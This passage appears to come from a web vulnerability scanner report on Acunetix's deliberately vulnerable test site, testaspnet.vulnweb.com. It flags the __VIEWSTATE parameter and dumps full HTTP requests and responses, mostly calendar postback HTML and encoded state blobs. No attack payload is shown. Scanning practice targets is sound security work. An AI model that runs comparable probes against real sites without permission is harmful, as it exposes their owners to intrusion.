14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1127 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,127 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8492&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgBA0TMNM9sIZGRkNt9Wzw8e7RHFFy7G9sNL1GAtaLw%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLcuPbTAQLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdaFII12mHc7bndboOc5DHANPwR1Q%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:07:40 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgBA0TMNM9sIZGRkNt9Wzw8e7RHFFy7G9sNL1GAtaLw=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLcuPbTAQLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwdaFII12mHc7bndboOc5DHANPwR1Q==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:White" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8496&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgBAeN0xNtsIZGRkyL6ZjAPfsVuBV2m9clQnbEmyzls%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLeqvjECwLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwcA%2FGoydWi0jkSew9P3TPdukbxcbw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:19:20 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgBAeN0xNtsIZGRkyL6ZjAPfsVuBV2m9clQnbEmyzls=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLeqvjECwLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwcA/GoydWi0jkSew9P3TPdukbxcbw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:White" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" 